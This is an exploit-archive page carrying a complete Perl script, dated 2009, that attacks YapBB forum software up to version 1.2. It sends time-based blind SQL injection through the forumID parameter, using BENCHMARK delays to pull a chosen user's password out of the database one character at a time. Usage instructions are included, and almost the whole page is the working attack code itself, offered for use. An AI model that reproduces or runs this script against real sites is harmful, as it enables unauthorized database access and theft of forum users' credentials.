[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : YapBB <= 1.2 (forumID) Blind SQL Injection Exploit
# Published : 2009-02-04
# Author : darkjoker
# Previous Title : Team 1.x (DD/XSS) Multiple Remote Vulnerabilities
# Next Title : GR Blog 1.1.4 (Upload/Bypass) Multiple Remote Vulnerabilities
--+++======================================================+++--
--+++====== YapBB <= 1.2 Blind SQL Injection Exploit ======+++--
--+++======================================================+++--
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
sub usage
{
die "nYapBB <= 1.2 Blind SQL Injection Exploit".
"n[?] Author : darkjoker".
"n[?] Site : http://darkjoker.net23.net".
"n[?] CMS Site: http://yapbb.sourceforge.net/".
"n[?] Usage : perl ${0} <hostname> <path> <username> [<key_list>]".
"n[?] Ex. : perl ${0} localhost /YapBB root abcdefghijklmnopqrstuvwxyz".
"nn";
}
sub query
{
my ($user, $chr, $pos) = @_;
my $query = "123 OR IF ((ASCII(SUBSTRING((SELECT password FROM ".
"forum_user WHERE nickname = '${user}'),${pos},1))=${chr}),BENCHMARK(200000000,CHAR(0)),0)";
$query =~ s/ /%20/g;
$query =~ s/'/%27/g;
return $query;
}
sub exploit
{
my ($hostname, $path, $user, $chr, $pos) = @_;
$chr = ord ($chr);
my $sock = new IO::Socket::INET (
PeerHost => $hostname,
PeerPort => 80,
Proto => "tcp"
) or die "n[!] Exploit failed.nn";
my $query = query ($user, $chr, $pos);
my $request = "GET ${path}/forumhop.php?action=next&forumID=${query} HTTP/1.1rn".
"Host: ${hostname}rn".
"Connection: Closernrn";
my $a = time ();
print $sock $request;
$_++ while (<$sock>);
$a = ($a - time ()) * -1;
close ($sock);
return 1 if ($a > 4);
return 0;
}
my ($hostname, $path, $user, $k_list) = @ARGV;
usage unless ($user);
my @key = split ("", ($k_list) ? $k_list : "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789");
my $chr = 0;
my $pos = 1;
my $password;
while ($chr < scalar (@key))
{
if (exploit ($hostname, $path, $user, $key [$chr], $pos))
{
$password .= $key [$chr];
$chr = 0;
$pos++;
}
else
{
$chr++;
}
}
print "n[+] Password: ${password}nn";
# www.Syue.com [2009-02-04]